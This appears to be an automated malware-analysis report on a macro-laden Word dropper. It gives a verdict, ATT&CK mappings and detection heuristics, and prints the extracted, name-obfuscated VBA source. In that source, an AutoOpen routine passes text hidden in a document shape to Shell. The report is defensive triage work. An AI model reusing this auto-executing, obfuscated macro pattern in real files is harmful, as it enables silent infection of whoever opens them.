Verdict: MALICIOUS
Risk Score: 292

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
The sample contains VBA macros with an autoopen function that triggers a Shell() call. This call executes cmd.exe with arguments that appear to construct and execute a PowerShell command. The PowerShell command is obfuscated but likely responsible for downloading and executing a second-stage payload from a remote location, as indicated by the embedded URL and the ClamAV detection name 'Doc.Dropper.Agent'.
Heuristics (10)

- ClamAV: Doc.Dropper.Agent-6830924-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6830924-0
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `_ .Shell(zVsVoHBaFPJ, qZhSoLXwd), oqmHUiq) jCucUFwTwawURwcBlANBW = (64603473 + Round(AQPjOsatYovwAmIdC) * 252979340 - tOaQpZnSrzoDMZntL + (VibYjafVBcPcWKO / Tan(PzazZKbZiujljXM)))`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Customizable = True Sub autoopen() bnqnq`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5183 bytes |

SHA-256: 5385865d12234347b8a5da60c5bbaa16d67d0befb1fa89bea3e7cebf058fc5dc

Detection (macros.bas):
- ClamAV: No threats found
- Obfuscation or payload: likely. 153 of 182 identifiers look randomly generated (e.g. 'LJQujEFAUdFBllzoinJfBfQP') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "RStCinJwZM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
bnqnq
End Sub
Attribute VB_Name = "fltlWwRJVIiFIr"
Function bnqnq()
On Error Resume Next
zjiinYLhwllDjGA = (181432626 + Round(uCLdacmOGqMTXwsbuvDfuRv) * 23104012 - IDJjLfbwhnwbbZE + (QjhzNZotcmLzwwcGIXRYcfuL / Tan(VqJuzSWwjdlNEsjOQGZUi)))
iKrTEHfTllWNsj = 207388330
UdmFiAitGiMBNaaSIuGBdZs = (55016008 + Round(dZNRYRpjIZQziHzidqIi) * 234516082 - WkAEszpQvkiYAaQciRXRF + (KSamITAikazvCc / Tan(TYqtrifVJGXRAIqKR)))
WahiFqWQNzEbFYoLPsjY = 93629754
NQiGZbjvwGZfzcs = (7951182 + Round(fhattQLaitfEPoow) * 47256574 - jNjaYCWhwFArlazDusuO + (zSjviAqjRliqzJocEJ / Tan(WMSGamHFHMuwBsKjuDf)))
BfBjURBnRJapjWrHhMFIbv = 232481328
aPPllqhmuXYDwZUAwSITL = (1117982 + Round(JVzFAopzbALOMOK) * 65207245 - MwsjaOcfXmclUUaaHGQnkhz + (ZzCnKIlmIQHOHbi / Tan(UZcBNMHfkoEIuWH)))
wmGdLpUPAqcDNLSfYJSL = 29370576
GkhoBpLDmYsUvJjdipWSkB = (200278905 + Round(idDhKdBLsjUHJKc) * 41656692 - ZiDubhpRCEcQpDEFbKXmis + (WjcOoYTTMQdKSaKD / Tan(NQIYZvCdQBhAFTKjZjOzSBsi)))
QALsmfQGaYOklzlZlYXmT = 44785202
zHljVJvqRMpMFB = (49424667 + Round(WwohoBCdHdaZvT) * 105533493 - YwPRuPkFqOcNdWc + (BrNnkUQwEIcsjWvzwknGl / Tan(GGMjrZYpzkBpXEGcUDiRNm)))
sWUTfQsiVzLkGbAdqaOIrr = 299404949
qiBtAVacBWhEKSizjCdWzr = (329437765 + Round(llvqhjGlqunrfiUaqh) * 12319430 - hoaBYzbohbowkjIPZj + (SQwOPfmSBhCjSpbozKuSiHR / Tan(PGoHwaEBGnjGlZ)))
WljaHiuWIIrLFfRL = 68580705
RiZLfMMcjkDjLJzwtaphfw = (340555788 + Round(cKSauNFSvUcvbTaAnCvkmWc) * 203923518 - GOJUwITfjjVumhSflkrhCXa + (pudCPGGhnjozww / Tan(LJQujEFAUdFBllzoinJfBfQP)))
coHDtSinkfYldqvjtIY = 67547064
IIkiRcBzjWMaCGQuibG = (160785397 + Round(SvjjozfzHHFAwFzLwrCiF) * 111492714 - CaNJiGRTUYppNBwdiW + (cPGaDATifjDpbBZhJaowspnl / Tan(JQkKzOYMHoFvAKIPXmj)))
iNnnUpCpZEncVzuki = 163169574
Set wpuGLn = RStCinJwZM.Shapes(FZCEz + "TnCpdnC" + vIWsFV)
MqJbIDwnaqlKKHmDEDjX = (258433863 + Round(SlRGoqjIUScNQABn) * 211775080 - wCqBOaIwqGuXGFtBYY + (BOGERVThzqlBQXMa / Tan(UQWrzqzcNwLWTPcddiGqw)))
futLIEEiAufIjHBSDYG = 180807017
CPlsVwzofpLjGH = (49301192 + Round(JMwGjWaGzqPiVVdULWcZDLF) * 320486877 - SObjidAEwVFfhSfoi + (fhSSKLqYjiiowHBpQIzXUNO / Tan(YAYpdEzkZRZPzADPtGt)))
VIWzisBXpGYSTsuKnB = 309195651
Set zjsATH = wpuGLn.TextFrame
RqKCTbsSStnwbSXzQb = (196643864 + Round(PEBzssqbwozwCqIsZTBftP) * 95727281 - IjPoSvFJsjFMoLKblQVivo + (lJfZwawvzqNqIcBJBjoFSkw / Tan(OJZtdtksTqiinV)))
jtnFWbUCwkHUuGi = 175535712
Set zzbKWN = zjsATH.ContainingRange
lnUCWvWnzRjZwzjQ = (237812479 + Round(CVGKWEVXKiJWwWbwjmUjOU) * 46309413 - LroJrXUAVLhiFaQQjzkr + (dVJwANtvAXiOdzfPMjmK / Tan(AkpwqJVEDPjPwhV)))
LrJaFUnzQcblATSzhVcl = 134468745
zVsVoHBaFPJ = zzbKWN + RJkBock + YqzIw + zqjOhjE + lhdFkKJh + OXiAR + OMNRBMY + zniVvW + bQSdU + HXipISpP
BhABizJfIwUKdbivQpJw = (152854576 + Round(JJzYEdwhZhFYhdcKLG) * 63439508 - nblSAhYOizZfGjXrEKsfh + (WmFEtBSFdDonhiXfXWF / Tan(wcHZRBFlGANdCMEwMvnWw)))
TVqTzpTYmVazbtffnswj = 333470739
nPaGdhbYdJUnUaHibwJ = (135911943 + Round(NIwYwKldWdNlcpjFW) * 210999175 - zrSOhtATmEYRzRLaHchjW + (vHjGCslYYFQaXXvtRiwqzZ / Tan(LOTQPbcozMGwKiarHiNfSAYu)))
fOKCjfrWJUsjbWwwQROQbk = 72541879
OzHjjTFlUoHXpSGDP = (144285357 + Round(YbDELtiaZkSDvBN) * 184509727 - XBvroVpwjnQRntZVappK + (wnFsfACkMVbqafOaNkFOFbG / Tan(JmrshUMYRlbOqzIU)))
NXSoaNOKvMFkwpUjsjtJKC = 287405869
zzCPVZEzpvSVlTar = (230266769 + Round(jfiLYpSGtbwZBIs) * 90803318 - WmqIZcAHwiLDkBBTMFqjoa + (zOjdBPtJcXfEFszK / Tan(dDaLGDIZuGpDCi)))
vZstswzsEUjfFw = 317017477
PEswTlwMZzjYin = (219674807 + Round(SXaJdoAwqoiOtfzuwIVwjNqa) * 2038329 - aVQrOjTWOFqZXbDtG + (HjTtzmcVSkSEjAJNOfiw / Tan(wvWQuEWlttnHLSQwjVi)))
sNjDKYpQJMYLIFIoz = 192977168
Const qZhSoLXwd = 0
NriKqCzWAjCNbYLcCa = (208053513 + Round(RvtDOhIMNiAlawvRYp) * 239185355 - lrTfmIKDsYCSNnDSw + (vJtkIVfRnfctENqQlab / Tan(QGWFUpciXntdTzta)))
AiwzVVfbwUobzCdqlK = 272920417
ZqwbWaEBAJZkOPKDVNwl = (258940347 + Round(KzplYtVtdwXNRwj) * 299510518 - zzkEffwWSscCjGis + (fzmlBLjGjbNAzMTcD / Tan(oCCiTqOFAtruroUzSmGYvmEz)))
ElVUjIafHuqOAdwWwKmPljZj = 332190777
XPEwJvzEqSPVLsTR = (187951437 + Round(BbXLTQwCwGVvXTdZ) * 70099477 - zqXnQBLIFXQfuBjqPK + (MwnAHwtivvvsmhwRmpNLWz / Tan(LYmQMTLhETjwbMqP)))
XSQNJfdwzkzBBwTNlcbVhj = 102750014
aiNOSjVhpDnwfWjfRwBCzj = (248338509 + Round(EmENEZKzGAIjjsXWLScDm) * 106792427 - IUwLLOcrrwfKjbHcPtoriNAw + (afqiHivnpwsHNzkiJRj / Tan(hruDpMKwYSuTwn)))
jlMjOjWrfPVCtDNVvRwqi = 241887088
ZYXcdWjTAJrWDwQ = (152651612 + Round(QfvIZYwUvtTGhiCHV) * 166907946 - mAWjfbJzzVTOlkIczSwA + (bHhdQNSapOiYkk / Tan(uwPjQZzzbihVZFCpW)))
fLsoCOOqYHGlpBAshAC = 117905583
uYzPWBYJ = Array(OBswhVS, AOoUKQ, KzzCCwCww, Interaction _
 _
 _
 _
 _
 _
 _
 _
 .Shell(zVsVoHBaFPJ, qZhSoLXwd), oqmHUiq)
jCucUFwTwawURwcBlANBW = (64603473 + Round(AQPjOsatYovwAmIdC) * 252979340 - tOaQpZnSrzoDMZntL + (VibYjafVBcPcWKO / Tan(PzazZKbZiujljXM)))
zYhEpViAkTXLCOddoGJnTLf = 73034815
End Function
```